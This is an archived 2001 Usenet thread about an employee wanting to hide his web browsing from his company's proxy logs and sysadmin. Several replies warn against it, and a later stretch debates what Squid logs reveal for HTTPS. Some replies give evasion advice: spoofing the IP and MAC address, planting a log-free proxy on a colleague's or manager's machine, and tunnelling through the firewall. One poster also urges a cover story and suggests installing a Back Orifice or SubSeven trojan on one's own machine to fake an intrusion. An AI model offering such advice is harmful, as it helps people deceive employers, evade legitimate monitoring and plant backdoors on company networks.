
Hiding our IP


Julien P.

Apr 25, 2001, 8:29:20 AM
In my company we have to go through a proxy to access internet. So the
system administrator can see what sites we are surfing. Is it possible, and
how, to hide, or even better to change, our IP address to our proxy, so the
system administrator will have a fake IP and so cannot know who is surfing
those sites ?

Thanks


Kane Swift

Apr 25, 2001, 8:36:48 AM

www.safeweb.com

It also encrypts the traffic with SSL so even if they tap the line they
won't know where you're going or what you're viewing.

Julien P. <jp...@mis.mc> wrote in message
news:9882016...@toffoli.webstore.fr...

Julien P.

Apr 25, 2001, 9:01:12 AM
But my goal will be to even hide that I am surfing on the web, so they don't
even know I am on the web. That is why I want to hide or change my IP for
the proxy...


"Kane Swift" <nob...@nodomain.com> wrote in message news:
9c6gd9$1lun$1...@buty.wanadoo.nl...

Ahab

Apr 25, 2001, 9:41:38 AM
It sounds like you want to combine port forwarding with secure
tunnelling to an external proxy. Unfortunately, chances are that your
company's firewall will block this, depends on how tight your sys
admin keeps the screws.

Port forwarding will stop your sys admin from being able to tell what
you're doing from the ports you use, and the SSL part of the equation
will encrypt the packets so he can't use a packet sniffer, and the
proxy will make sure he can't see where the packets are going.

--
Regards,

Ahab
ahab<at>nym<dot>alias<dot>net
#Ahab on DALnet

And on the third day, God said:
"Let there be div(D)=Pf, div(B)=0, curl(E)=-dB/dt, curl(H)=jf+dD/dt"


"Julien P." <jp...@mis.mc> wrote in message

news:9882034...@toffoli.webstore.fr...

Julien P.

Apr 25, 2001, 9:58:08 AM
Oh... What I just would like to do is to fake my IP so for example my admin
will believe the one that is surfing one web site is 191.168.0.160 for
example and in real my real IP address is not this one.

But I don't know if it is possible...

"Ahab" <see...@sig.block> wrote in message news:
muAF6.103829$n56.2...@news.easynews.com...

nemo outis

Apr 25, 2001, 11:01:53 AM
There's a whole technology around tunnelling out - you might see if this will
do the trick for you. You use "httport" to tunnel out to an outside proxy
server. (Look 'em up.) But if you want to get fancy you can roll your own and
set up, say, your home computer as the proxy server you tunnel out to by
installing htthost. (There are cracks for httport to get the encryption
features, etc. or I suppose you could even pay for it.)

Take a look at:

http://www.htthost.com/

There are also "socks" ways of doing this with socks2http. I haven't looked
into whether there is any secure https version tunnelling software around
somewhere - you might come across something in your searches.

Regards,

In article <98820687...@toffoli.webstore.fr>, "Julien P." <jp...@mis.mc>
wrote:

Ahab

Apr 25, 2001, 11:35:55 AM
Why not try the Freedom client, it's free. It will filter out most
ads, and has a cookie manager and other stuff.

--
Regards,

Ahab
ahab<at>nym<dot>alias<dot>net
#Ahab on DALnet

And on the third day, God said:
"Let there be div(D)=Pf, div(B)=0, curl(E)=-dB/dt, curl(H)=jf+dD/dt"


> Gillhaney says:
> > Anonymizers are though, aren't they?
>
> Yeah, but it's run by greedy scroogeian assholes who purposely
> slow you down and clutter your browser with a lot more ads. If you
> don't want to see graphics, I suggest cotse.com
>
> http://www.cotse.com/anonimizer.htm
>
> Yes, they spell it that way. It's fast and removes ads. I rarely
> surf with images turned on these days anyway. Most sites have too
> many ads and bandwidth is just too important to waste on those
> parasites. I also refuse to enable cookies and java/script.
>
> Alternatively, I would suggest the proxy at http://anon.xg.nu , but
> they'll be history in two weeks. I'm willing to bet that no one
> donated anything. Their services are easy to use, but not very
> efficient.
>
> --
> Shale
>
> "Did you ever look up the word 'mercenary'? It's
> someone who 'works merely for money.' It's not
> the money that bothers me, it's the 'merely'."

Juergen Nieveler

Apr 25, 2001, 3:21:52 PM
"Julien P." <jp...@mis.mc> wrote in
<9882016...@toffoli.webstore.fr>:

Can't be done.

And if the administrator and your company don't want you to surf to certain
sites, then you'd better not try to outsmart them... otherwise you'll see
how fast they can detect it and fire you.

--
Juergen Nieveler
Support the ban of Dihydrogen Monoxide: http://www.dhmo.org/
"The people united can never be ignited!"- Sgt. Colon, Ankh-Morpork Watch
www.bofh.mynetcologne.de / bo...@netcologne.de / PGP Supported!

Dave Howe

Apr 25, 2001, 3:47:47 PM
In our last episode (<alt.security.pgp>[25 Apr 2001 19:21:52 GMT]),
juergen....@web.de (Juergen Nieveler) said :
>Can't be done.
can be, but is risky.

>And if the administrator and your company don't want you to surf to certain
>sites, than you'd better not try to outsmart them... otherwise you'll see
>how fast they can detect it and fire you.

yup, this is more to the point.

methods
1. change your IP address to something else. while you are at it,
change your MAC address to something else too (most network cards
support this, but you will have to research how it is done yourself)
consider your MAC address to be like an ip address that is "lower" and
closer to the wire than IP - routers learn to associate an IP address
with a MAC address for purposes of routing, so it is possible to
backtrack a machine via this too.
2. find a machine that is permitted to surf (such as a webserver or a
upper management machine *grin*) and install a proxy server on it.
disable any logs on the proxy, and bounce your packets off that rather
than off the official proxy.

downside is as above - if you get caught websurfing, you will get a
telling off. if you get caught deliberately buggering about with your
IP, MAC or someone else's machine, you will be looking for a new job.
Don't try it on *my* network as I *will* notice, and retribution will
be swift (once I track you down) :)

<alt.security.pgp snipped - can't see why it was crossposted there
anyhow.>
--== DaveHowe ( is at) Bigfoot dot com ==--

Paul Rubin

Apr 25, 2001, 6:08:48 PM
"Julien P." <jp...@mis.mc> writes:
> But my goal will be to even hide that I am surfing on the web, so they dont
> even know I am on the web. That is why I want to hide or change my IP for
> the proxy...

Get yourself a WAP phone and surf on your own nickel :).

Paul Rubin

Apr 25, 2001, 7:35:55 PM
gill...@bigfoot.com (Gillhaney) writes:
> >http://www.cotse.com/anonimizer.htm
>
> That's my favourite, especially for visiting those risky sites where you
> don't know what's gonna be running in the background.

My favorite is now safeweb, since it uses SSL on the local side.
I wish Cotse would do the same.

Thomas Shaddack

Apr 25, 2001, 7:29:11 PM
juergen....@web.de (Juergen Nieveler) wrote in
<Xns908EC8057E4E...@nieveler-43544.user.cis.dfn.de>:

>>In my company we have to go through a proxy to access internet. So the
>>system administrator can see what sites we are surfing. Is it possible,
>>and how, to hide, or even better to change, our IP address to our
>>proxy, so the system administrator will have a fake IP and so cannot
>>know who is surfing those sites ?
>
>Can't be done.
>
>And if the administrator and your company don't want you to surf to
>certain sites, than you'd better not try to outsmart them... otherwise
>you'll see how fast they can detect it and fire you.

Can you make an SSH (or telnet) connection out?
Do you want text and can sacrifice the pictures?

If you answer both yes, the solution is simple.
A unixoid (Linux, *BSD, AIX, BeOS, whatever) account "outside". Connect
there, run Lynx, browse the Net.

Or study your firewall. You could open a persistent connection through port
80, opening HTTP tunnel to another machine. Will require some programming
on both sides. Alternatively, you could tunnel through any other protocol;
I heard about full TCP/IP tunnelling through AIM messaging.

Don't try to outsmart a smart sysadmin; but, as far as I seen/heard, they
are rare. Don't be too bold, don't hog the bandwidth; keep low profile,
don't do anything that would attract attention when browsing the logs.

Shaddack, the Mad Scientist

Thomas Shaddack

Apr 26, 2001, 6:08:41 AM
Ring Zero <ring...@fredsinc.com> wrote in
<p1peet8h1u3lbs8e2...@4ax.com>:

> Yeah, but still, if your IS dept. is watching, they may
>question why you are using an anonymizing service. That's a sure sign
>that you're probably doing something that is not company business.

You could claim you don't want to make the company associated with your
online activities, in order to prevent their eventual liability?

In case you get questioned, prepare a cover story that would in a believable
way claim you are protecting the company's interests. Could work :)

Juergen Nieveler

Apr 26, 2001, 6:28:57 AM
NOSPAMs...@type2.com (Thomas Shaddack) wrote:

>Or study your firewall. You could open a persistent connection through
>port 80, opening HTTP tunnel to another machine. Will require some
>programming on both sides. Alternatively, you could tunnel through any
>other protocol; I heard about full TCP/IP tunnelling through AIM
>messaging.

Uh... I'd suggest to first study your contract. Otherwise you might be in
for a NASTY surprise, namely two people escorting you out after cleaning
out your desk.

>Don't try to outsmart a smart sysadmin; but, as far as I seen/heard,
>they are rare. Don't be too bold, don't hog the bandwidth; keep low
>profile, don't do anything that would attract attention when browsing
>the logs.

Or just DON'T DO IT.

Do not underestimate your Sysadmin... he might seem dumb, he might seem to
be a nerd, but he was smart enough to be hired as a Sysadmin.

Juergen Nieveler

Apr 26, 2001, 7:54:06 AM
NOSPAMs...@type2.com (Thomas Shaddack) wrote:

>You could claim you don't want to make the company associated with your
>online activities, in order to prevent their eventual liability?

In which case they would ask "What did you do that _could_ make us liable?"
and "What does it have to do with your job here and why did you have to do
it during your work time?"

Thomas Shaddack

Apr 26, 2001, 7:48:57 AM
juergen....@web.de (Juergen Nieveler) wrote in
<Xns908F682D713F...@nieveler-43544.user.cis.dfn.de>:

>>Or study your firewall. You could open a persistent connection through
>>port 80, opening HTTP tunnel to another machine. Will require some
>>programming on both sides. Alternatively, you could tunnel through any
>>other protocol; I heard about full TCP/IP tunnelling through AIM
>>messaging.
>
>Uh... I'd suggest to first study your contract. Otherwise you might be
>in for a NASTY surprise, namely two people escorting you out after
>cleaning out your desk.

You have to be caught first.
Then, depending on your bosses, you could happen to become the new
sysadmin. On many local schools the students that hack the school networks
are put in charge of it. (IMHO, clever solution how to get cheap, qualified
admins there.) Anyway, you have to count with being caught; but if you
aren't careless and have a dumb admin, you have good chance. If you get
caught, the results will depend on the people you will have to deal with.
Risk also depends on your abilities to eventually find a new job; hightech
skills, largely necessary to fool the networks, help here as well.

>>Don't try to outsmart a smart sysadmin; but, as far as I seen/heard,
>>they are rare. Don't be too bold, don't hog the bandwidth; keep low
>>profile, don't do anything that would attract attention when browsing
>>the logs.
>
>Or just DON'T DO IT.
>
>Do not underestimate your Sysadmin... he might seem dumb, he might seem
>to be a nerd, but he was smart enough to be hired as a Sysadmin.

If he seems to be a nerd, it's probable he will know his network; never
judge technician's skills from how he looks, it often corresponds inversely
(true aces tend to be asocial/antisocial types). However, the fact one is
hired as a sysadmin by far doesn't have to mean he is smart enough; it
means only that the *management* thought he is smart enough. Often they are
just MCSE-having drones; it isn't coincidence MCSE is rumoured to mean Must
Call Someone Experienced. I seen some sad cases, and my friends techies
told me more similar stories...

Your sysadmin may be a drone, relying on easy-to-fool scanning tools. Or he
may be a knows-it-all ace that will spot you from a single glance to the
logfiles. You have to know your adversary.

Shaddack, the Mad Scientist

Thomas Shaddack

Apr 26, 2001, 10:29:33 AM
juergen....@web.de (Juergen Nieveler) wrote in
<Xns908F80BA6A7C...@nieveler-43544.user.cis.dfn.de>:

>NOSPAMs...@type2.com (Thomas Shaddack) wrote:
>
>>You could claim you don't want to make the company associated with
>>your online activities, in order to prevent their eventual liability?
>
>In which case they would ask "What did you do that _could_ make us
>liable?" and "What does it have to do with your job here and why did you
>have to do it during your work time?"

If you will do it right, the chance you will get caught is small.

You don't necessarily need even to install any special software on your
machine; depending on your needs, maybe you could establish a 'tunnel' out
via a java applet, downloadable and installable via a webpage.

Also, by infecting your own machine by a trojan, ie. Back Orifice or
Subseven, you can achieve certain degree of deniability, as long as you
will not be caught red-handed. (Be careful here to not put the company
security into jeopardy; keep the backdoor passworded. You don't want to
attract an intruder; you want to make an appearance there was one. You must
make completely believable image of outside intrusion. Again, depends on
how careful the sysadmin is, if he scans the network for backdoors - then
avoid this. Most sysadmins' security consciousness is quite lax, though.)
To clarify more and to balance the risks/benefits/costs, I'd need to know
more accurately what do you need/want to accomplish; if it's watching
football results, access to a webmail, or 'tunneling out' sensitive
information.

Concrete approach depends mainly on what exactly do you want to do.
Sometimes a simple PHP script accessed via HTTPS will do its job; sometimes
you need to telnet out; sometimes you need full-scale TCP/IP tunneling.

A question for the Public: Is there a java applet that can serve as SSH
client? A webpage that would contain a console screen? A lot of el-neato
toys could be written in Java, then run as an applet from a webpage.

Shaddack, the Mad Scientist

Julien P.

Apr 26, 2001, 11:25:54 AM
All I want to do sometimes is accessing my email via a web page and game
sites...

"Thomas Shaddack" <NOSPAMs...@type2.com> wrote in message news:
Xns908FA4BD3804...@195.250.128.40...

anonymous

Apr 26, 2001, 6:52:05 PM
But how do you know that at this very moment your employer is not searching
that entity which used to be deja news in order to see what you are posting
here ?

What then.........

"Julien P." <jp...@mis.mc> wrote in message

news:9882034...@toffoli.webstore.fr...

David Ness

Apr 26, 2001, 11:54:45 PM
Bast...@Paris.gov wrote:
>
> I have to wonder about all this. Has anyone done a study concerning what
> nonproductive resources employers put into spying on the surfing time and
> proclivities of their employees? Should not the bottom line be employee
> productivity? Period!
>

A pretty naive view of business. These days employers are very often in rather
severe legal jeopardy for the actions of their employees. If employers do not
exercise judicious attention to their employees' activities they may end up
in real trouble. Imagine an employee running a gambling or prostitution ring on
a corporate machine as an extreme example.

Johan Wevers

Apr 27, 2001, 2:47:31 AM
Thomas Shaddack wrote:

> A question for the Public: Is there a java applet that can serve as SSH
> client? A webpage that would contain a console screen? A lot of el-neato
> toys could be written in Java, then run as an applet from a webpage.

Webmin (www.webmin.com) contains a hhps server and a Java telnet applet.
However, this requires root access to a Unix machine on the net. But
perhaps it can be rewritten for this purpose?

--
ir. J.C.A. Wevers // Physics and science fiction site:
joh...@iae.nl // http://www.xs4all.nl/~johanw/index.html
PGP/GPG public keys at http://www.xs4all.nl/~johanw/pgpkeys.html

Johan Wevers

Apr 27, 2001, 2:48:43 AM
Shale wrote:

> Unfortunately the ads clutter the interface.

www.junkbusters.com

> And the URLs are not encrypted at all.

Too bad.

Johan Wevers

Apr 27, 2001, 2:51:07 AM
"Julien P." wrote:

> But my goal will be to even hide that I am surfing on the web, so they dont
> even know I am on the web. That is why I want to hide or change my IP for
> the proxy...

Install a proxyserver on another computer in the company and surf through
that proxy. It will then appear as if the other computer is surfing.

However, it opens the risk of that other computer being thoroughly examined.
So make sure this proxy is not backtraceable to you (so, for example, only
allowing access from your own machine is a bad idea).

Johan Wevers

Apr 27, 2001, 11:05:56 AM
Bast...@Paris.gov wrote:

> No, it's not an extreme example. Employees have been misusing their employers'
> assets for their own ends since time immemorial. In doing so, they are not
> doing the job for which they were hired and should be fired.

Don't overreact, it is sometimes considered as part of the reward for the
job. And for some jobs here there is such a shortage on personnel that some
employers silently allow such things to happen. If they fire him, no one will
do the job.

Paul Rubin

Apr 27, 2001, 2:02:07 PM
Johan Wevers <joh...@iae.nl> writes:
> > A question for the Public: Is there a java applet that can serve as SSH
> > client? A webpage that would contain a console screen? A lot of el-neato
> > toys could be written in Java, then run as an applet from a webpage.
>
> Webmin (www.webmin.com) contains a hhps server and a Java telnet applet.
> However, this requires root access to a Unix machine on the net. But
> perhaps it can be rewritten for this purpose?

www.mindbright.com has a java ssh applet called Mindterm. It's handy.
It does require opening a connection from the browser to the remote
computer's ssh port, which some firewalls interfere with. I've figured
out ways around this problem but not gotten around to implementing them.

Paul Rubin

Apr 27, 2001, 2:04:19 PM
"Julien P." <jp...@mis.mc> writes:
> But my goal will be to even hide that I am surfing on the web, so they dont
> even know I am on the web. That is why I want to hide or change my IP for
> the proxy...

Totally ignoring the issue of what you're up to, you're asking
something like "I want to make outgoing phone calls through the
company phone system without the company knowing I'm making them".
Sorry. Aside from location-specific answers like "hack the company
PBX", there's no way to do that. The closest you can come is bring
your own cellular phone to work and make your calls from that.

Paul Rubin

Apr 27, 2001, 8:52:10 PM
Johan Wevers <joh...@iae.nl> writes:
> > No, it's not an extreme example. Employees have been misusing
> > their employers' assets for their own ends since time
> > immemorial. In doing so, they are not doing the job for which they
> > were hired and should be fired.
>
> Don't overreact, it is sometimes considered as part of the reward for the
> job. And for some jobs here there is such a shortage on personnel that some
> employers silently allow such things to happen. If they fire him, no one will
> do the job.

It's considered normal and acceptable where I work, to make a personal
phone call from work every once in a while. But normally one doesn't
try to bypass the phone accounting system to disguise the call's
existence. That would be considered abnormal and suspicious, not
normal and acceptable.

Thomas J. Boschloo

Apr 30, 2001, 3:46:10 PM
Johan Wevers wrote:
>
> Shale wrote:
>
> > Unfortunately the ads clutter the interface.
>
> www.junkbusters.com

Even better, combined with <http://www.webwasher.com> and
<http://proxomitron.cjb.net> you have killer ad-killer capabilities. I
wouldn't even use junkbusters anymore when using those two programs.
Combined they do the same thing and they do it much easier.

Proxomitron kills the animated gif banners and blocks the referers and
user-agent headers. Webwasher blocks the ad-providers and automatically
spots ads by their size and dimensions (if you set it to).

Thomas
--
"The only way out is through" - Trent Reznor


Thomas J. Boschloo

Apr 30, 2001, 3:46:55 PM
Secret Squirrel wrote:
>
> On Wed, 25 Apr 2001, Shale <bere...@the.substitute> wrote:

> >Unfortunately the ads clutter the interface. And the URLs are not
> >encrypted at all.
> >
> The ads are trivial; if they help keep the service free, I'm glad to
> put up with them. So far, the service has been very quick; I hope they
> can keep pace.
>
> I don't understand your remark about the URLs; could you elaborate?

Something like
<http://anonymous-server.com/?www.doihaveaids.org/ihopemyemployerdoesntfindout>
can be very revealing.

There is also the thing about ads that Stephen Gielda has said in the
past, the ad providers want unique ip-addresses, your address. And a
referer header (that most people don't know about) can also be very
revealing.

Thomas J. Boschloo

Apr 30, 2001, 3:47:33 PM
Thomas Shaddack wrote:

> A question for the Public: Is there a java applet that can serve as SSH
> client? A webpage that would contain a console screen? A lot of el-neato
> toys could be written in Java, then run as an applet from a webpage.

I have never really tried it myself, so I don't know how it works, but
do you know of Java Anonymous Proxy (JAP)?
<http://anon.inf.tu-dresden.de>. I know it comes from a good stock ;-> I
mean, <http://www.inf.tu-dresden.de/~hf2/anon/> is there and they seem
to do some anonymity research at that technical university (tu) in
Germany.

Dave Howe

Apr 30, 2001, 6:58:08 PM
In our last episode (<alt.security.pgp>[Mon, 30 Apr 2001 21:46:55
+0200]), "Thomas J. Boschloo" <nos...@multiweb.nl> said :

and indeed, would show up in proxy logs as such (usually preceded by
the words GET or POST)
however, if it is HTTP you do not get to see the url - what you get in
the logs looks like this:
CONNECT www.safeweb.com:443 HTTP/1.0
so they get to see you went to safeweb, but not what you did there

>There is also the thing about ads that Stephen Gielda has said in the
>past, the ad providers want unique ip-addresses, your address. And a
>referer header (that most people don't know about) can also be very
>revealing.

Safeweb blocks both.

Juergen Nieveler

May 1, 2001, 11:25:13 AM
Dave Howe <Spam.B...@bigfoot.com> wrote in
<s7rretklo5l4r6lnf...@4ax.com>:

>><http://anonymous-server.com/?www.doihaveaids.org/ihopemyemployerdoesntfindout>
>>can be very revealing.
>and indeed, would show up in proxy logs as such (usually preceeded by
>the words GET or POST)
>however, if it is HTTP you do not get to see the url - what you get in
>the logs looks like this:
>CONNECT www.safeweb.com:443 HTTP/1.0
>so they get to see you went to safeweb, but not what you did there

Nope... sorry to correct you.

A properly configured proxy (a Squid with standard config will do) will
show you the complete URL, including which picture was loaded.

Squid-Logs do make a funny reading... especially if you grep them for
certain keywords :-)

Nomen Nescio

May 1, 2001, 3:50:10 PM
Mon, 30 Apr 2001 in <s7rretklo5l4r6lnf...@4ax.com> Dave Howe Spam.B...@bigfoot.com
wrote:

To use Safeweb Java & Java Scripts must be ON ?


Jeremy Bishop

May 1, 2001, 3:59:17 PM
Juergen Nieveler wrote:
>
> Dave Howe <Spam.B...@bigfoot.com> wrote in
> <s7rretklo5l4r6lnf...@4ax.com>:

[small snip]

> >however, if it is HTTP you do not get to see the url - what you get in
> >the logs looks like this:
> >CONNECT www.safeweb.com:443 HTTP/1.0
> >so they get to see you went to safeweb, but not what you did there
>
> Nope... sorry to correct you.
>
> A properly configured proxy (a Squid with standard config will do) will
> show you the complete URL, including which picture was loaded.

Might either of you post a clarification? What I am seeing is Dave
talking about HTTPS and spelling it HTTP, and Juergen talking about
HTTP. So, which is it?

--
"A pentagram approaches a circle for
sufficiently large values of five."
-- Jerry, in The Wizardry Cursed by Rick Cook

Juergen Nieveler

May 1, 2001, 4:23:07 PM
Jeremy Bishop <req...@org.praetor> wrote in
<3AEF1595...@org.praetor>:

>Might either of you post a clarification? What I am seeing is Dave
>talking about HTTPS and spelling it HTTP, and Juergen talking about
>HTTP. So, which is it?

Both HTTP and HTTPS will be logged with a complete URL.

Some anonymizers have an option to encrypt the requested URL, though...
maybe that's what he's been thinking of. In this case, you'd see (rough
example...):

http://www.(anonymizer of choice).com/ush73gsskhduee/

instead of

http://www.(anonymizer of choice).com/show=www.sex.com/

Maybe that's what he was thinking of... this is one of the reasons why
anonymizers are among the top of the list when an Admin blocks access to
certain sites.

Paul Rubin

May 1, 2001, 8:24:12 PM
juergen....@web.de (Juergen Nieveler) writes:
> >CONNECT www.safeweb.com:443 HTTP/1.0
> >so they get to see you went to safeweb, but not what you did there
>
> Nope... sorry to correct you.
>
> A properly configured proxy (a Squid with standard config will do) will
> show you the complete URL, including which picture was loaded.

I don't see how it can do that. Safeweb uses SSL, so the URL path
(the part after the hostname) is encrypted.

Anonymous

May 1, 2001, 8:32:01 PM
Mon, 30 Apr 2001 in <s7rretklo5l4r6lnf...@4ax.com> Dave Howe Spam.B...@bigfoot.com
wrote:
> .

How do you use Safeweb ?
Is it safe ?
Any special configurations that have to be on ?

Safeweb primary revenue is from CIA contracts,
how this could make them safe ? When CIA hand
is feeding them, how they anonymizing
service could be trusted ? It is against
logic, doesn't it ?

Jeremy Bishop

May 1, 2001, 9:59:50 PM
Juergen Nieveler wrote:
>
> Jeremy Bishop <req...@org.praetor> wrote in
> <3AEF1595...@org.praetor>:
>
> >Might either of you post a clarification? What I am seeing is Dave
> >talking about HTTPS and spelling it HTTP, and Juergen talking about
> >HTTP. So, which is it?
>
> Both HTTP and HTTPS will be logged with a complete URL.
>
> Some anonymizers have an option to encrypt the requested URL, though...
> maybe that's what he's been thinking of. In this case, you'd see (rough
> example...):

Yes, I have run across one of those before. Anyway, I couldn't shake
the feeling of wrongness, so I installed squid (default prefs) to give
it a run. Here is a sampling of the logs:

988767403.116 3474 127.0.0.1 TCP_MISS/000 3863 CONNECT
www.praetor.org:443 - DIRECT/www.praetor.org -
(repeated about eight times.)

Every request but the first was to a specific page (e.g.
praetor.org/about.html), but only the hostname was logged, as above.
With ordinary HTTP the complete GET request is shown:

988768024.211 130 127.0.0.1 TCP_MISS/200 4114 GET
http://www.praetor.org/resources.html - DIRECT/www.praetor.org text/html

This would be compatible with the idea that beyond the initial CONNECT,
all other URL information (images, etc) would be handled within the
encrypted channel.

Do I win yet?

--
Intel: where Quality is job number 0.9998782345!

Paul Rubin

May 2, 2001, 1:11:39 AM
Nomen Nescio <nob...@dizum.com> writes:
> To use Safeweb Java & Java Scripts must be ON ?

Safeweb uses javascript for its own UI, but can filter javascript
out of the incoming remote pages. It doesn't use java, just javascript.

Juergen Nieveler

May 2, 2001, 4:25:42 AM
Jeremy Bishop <req...@org.praetor> wrote:

>Do I win yet?

This seems rather strange... I get the following in my Access.log (Name of
the parent proxy deleted, as it's a company-proxy):

988785395.830 211 10.153.144.145 TCP_REFRESH_HIT/304 386 GET
http://web.icq.com/lib/image/0,,3706,00.gif -
DEFAULT_PARENT/proxy.***.***.de image/gif

Jeremy Bishop

May 2, 2001, 2:50:29 PM
Juergen Nieveler wrote:

> This seems rather strange... I get the following in my Access.log (Name of
> the parent proxy deleted, as it's a company-proxy):
>
> 988785395.830 211 10.153.144.145 TCP_REFRESH_HIT/304 386 GET
> http://web.icq.com/lib/image/0,,3706,00.gif -
> DEFAULT_PARENT/proxy.***.***.de image/gif

And for an HTTPS connection?

--
Real programmers don't bring brown-bag lunches. If the vending machine
doesn't sell it, they don't eat it. Vending machines don't sell quiche.

Dave Howe

May 2, 2001, 5:07:06 PM
In our last episode (<alt.security.pgp>[1 May 2001 15:25:13 GMT]),
juergen....@web.de (Juergen Nieveler) said :

>Dave Howe <Spam.B...@bigfoot.com> wrote in
><s7rretklo5l4r6lnf...@4ax.com>:
>
>>><http://anonymous-server.com/?www.doihaveaids.org/ihopemyemployerdoesntfindout>
>>>can be very revealing.
>>and indeed, would show up in proxy logs as such (usually preceeded by
>>the words GET or POST)
>>however, if it is HTTP you do not get to see the url - what you get in
>>the logs looks like this:
>>CONNECT www.safeweb.com:443 HTTP/1.0
>>so they get to see you went to safeweb, but not what you did there
>
>Nope... sorry to correct you.
>A properly configured proxy (a Squid with standard config will do) will
>show you the complete URL, including which picture was loaded.
no, sorry - it was midnight and I typoed ;)
connects to 443 would be HTTPS, which if Squid can look inside I
*REALLY* need to take a good hard look at squid ;)

Dave Howe

May 2, 2001, 5:11:57 PM
In our last episode (<alt.security.pgp>[Wed, 2 May 2001 02:32:01
+0200]), Anonymous <nob...@remailer.privacy.at> said :

>How do you use Safeweb ?
you go to the url

>Is it safe ?
within reason, yes.

>Any special configurations that have to be on ?

javascript enabled.

>Safeweb primary revenue is from CIA contracts,
>how this could make them safe ?

CIA "security firm" investment cover invested openly in Safeweb -
AFTER it had proved itself.

>When CIA hand
>is feeding them, how they anonymizing
>service could be trusted ?

If selling something openly to the CIA makes you suspect, I doubt many
firms in America would be clean.

>It is against
>logic, doesn't it ?

Not really. There is no evidence that Safeweb has anything to do with
the CIA beyond selling them a product - but to be honest, are you
planning to do anything VIA safeweb that would be worth the CIA
letting the world know they have a finger in the pie? Governments
have happily let thousands of people die before now to hide the fact
they can eavesdrop on sensitive conversations......

Paul Rubin

unread,
May 2, 2001, 6:27:34 PM5/2/01
to
juergen....@web.de (Juergen Nieveler) writes:
> Both HTTP and HTTPS will be logged with a complete URL.

How can that be? In HTTPS, the URL path is sent through the SSL connection.
The proxy can't log it without breaking the encryption.

Paul Rubin

unread,
May 2, 2001, 6:29:12 PM5/2/01
to
juergen....@web.de (Juergen Nieveler) writes:
> >Do I win yet?
>
> This seems rather strange... I get the following in my Access.log (Name of
> the parent proxy deleted, as it's a company-proxy):
>
> 988785395.830 211 10.153.144.145 TCP_REFRESH_HIT/304 386 GET
> http://web.icq.com/lib/image/0,,3706,00.gif -
> DEFAULT_PARENT/proxy.***.***.de image/gif

That's an http request, not an https request. If it was https, you
wouldn't see the /lib/image/... part. Here's an https page you can
visit through your proxy:
https://www.nightsong.com:8443/crypto/dice.php
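
What the proxy operator sees in each case, as an added example (not from any poster): a parser for Squid's native access.log format, run over the HTTP entry quoted in the thread and a constructed CONNECT entry for an HTTPS session. The CONNECT line and all function names are assumptions made for the illustration.

```javascript
// Added illustration. Field order of Squid's native access.log format:
// time elapsed client code/status bytes method URL ident peer/host type
function parseSquidLine(line) {
  const f = line.trim().split(/\s+/);
  if (f.length < 10) return null; // wrapped or truncated entry
  const [time, elapsed, client, result, bytes, method, target, ident, peer, type] = f;
  const [cacheCode, status] = result.split("/");
  return { time: Number(time), elapsed: Number(elapsed), client, cacheCode,
           status: Number(status), bytes: Number(bytes), method, target,
           ident, peer, type };
}

// What the log entry reveals about the destination.
// For CONNECT the proxy only ever receives "host:port"; the path travels
// inside the SSL session and never reaches the log.
function describeExposure(entry) {
  if (entry.method === "CONNECT") {
    const cut = entry.target.lastIndexOf(":");
    return { client: entry.client, method: entry.method,
             host: entry.target.slice(0, cut),
             port: Number(entry.target.slice(cut + 1)),
             path: null };
  }
  let url;
  try {
    url = new URL(entry.target);
  } catch (err) {
    return null; // not an absolute URL, nothing to classify
  }
  const defaultPort = url.protocol === "https:" ? 443 : 80;
  return { client: entry.client, method: entry.method,
           host: url.hostname,
           port: url.port ? Number(url.port) : defaultPort,
           path: url.pathname + url.search };
}

function exposureReport(lines) {
  return lines.map(parseSquidLine)
              .filter((e) => e !== null)
              .map(describeExposure)
              .filter((e) => e !== null);
}

const SAMPLE_LOG = [
  // Entry quoted in the thread, re-joined onto one line.
  "988785395.830 211 10.153.144.145 TCP_REFRESH_HIT/304 386 GET " +
    "http://web.icq.com/lib/image/0,,3706,00.gif - " +
    "DEFAULT_PARENT/proxy.***.***.de image/gif",
  // Constructed entry for an HTTPS session through the same proxy.
  "988785401.112 5312 10.153.144.145 TCP_MISS/200 4821 CONNECT " +
    "www.safeweb.com:443 - DEFAULT_PARENT/proxy.***.***.de -",
];

for (const row of exposureReport(SAMPLE_LOG)) {
  const seen = row.path === null ? "(path not visible)" : row.path;
  console.log(`${row.client} ${row.method} ${row.host}:${row.port} ${seen}`);
}
```

In both cases the client address and the destination host are logged; only the path is hidden for HTTPS.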


Paul Rubin

unread,
May 2, 2001, 6:30:35 PM5/2/01
to
Anonymous <nob...@remailer.privacy.at> writes:
> How do you use Safeweb ?
> Is it safe ?
> Any special configurations that have to be on ?

I use safeweb pretty often. It seems pretty safe. If I was doing
something really secret I wouldn't use it, but I'm fine with it for
just avoiding leaving my IP address with possible spammers etc.

A. Melon

unread,
May 2, 2001, 7:33:56 PM5/2/01
to
On Wed, 02 May 2001 22:11, Dave Howe <Spam.B...@bigfoot.com>
wrote..

>Governments have happily let thousands of people die before now
>to hide the fact they can eavesdrop on sensitive conversations..

The CIA contracted Safeweb. Safeweb should be considered monitored.

Safeweb is not secure.. I tested Safeweb with an embedded object and
'the worm bot' clearly showed my original IP#, together with the IP#
of the Safeweb relay.

That's all I have to say about that.

StJohn.

Juergen Nieveler

unread,
May 3, 2001, 4:22:07 AM5/3/01
to
Paul Rubin <phr-...@nightsong.com> wrote:

>How can that be? In HTTPS, the URL path is sent through the SSL
>connection. The proxy can't log it without breaking the encryption.

Sorry, that was an out-of-coffee-error.

You're right, of course... squid cannot cache HTTPS, and therefore won't
put anything in its log.

*must drink more coffee* :-)

Juergen Nieveler

unread,
May 3, 2001, 4:22:08 AM5/3/01
to
Dave Howe <Spam.B...@bigfoot.com> wrote:

>no, sorry - it was midnight and I typoed ;)
>connects to 443 would be HTTPS, which if Squid can look inside I
>*REALLY* need to take a good hard look at squid ;)

Ah... that about clears it up :-)

Of course, 443 is proxied transparently, so it won't show up in the cache
log, I guess.

Anonymous

unread,
May 3, 2001, 9:01:36 AM5/3/01
to

>
> To use Safeweb Java & Java Scripts must be ON ?


If that is the case, I would feel _anything_ but "safe".


Free-man

unread,
May 3, 2001, 12:04:05 PM5/3/01
to
On Thu, 3 May 2001 06:01:36 -0700, Anonymous <nob...@digilicious.com>
wrote:

>
>>
>> To use Safeweb Java & Java Scripts must be ON ?
>
>
>If that is the case, I would feel _anything_ but "safe".

According to Safeweb's FAQ, it is not necessary to enable
Java or JavaScript.

But either way, Safeweb does not work with my Opera browser.
I get the error message, "illegal address".

Rich Eramian aka freeman at shore dot net



Paul Rubin

unread,
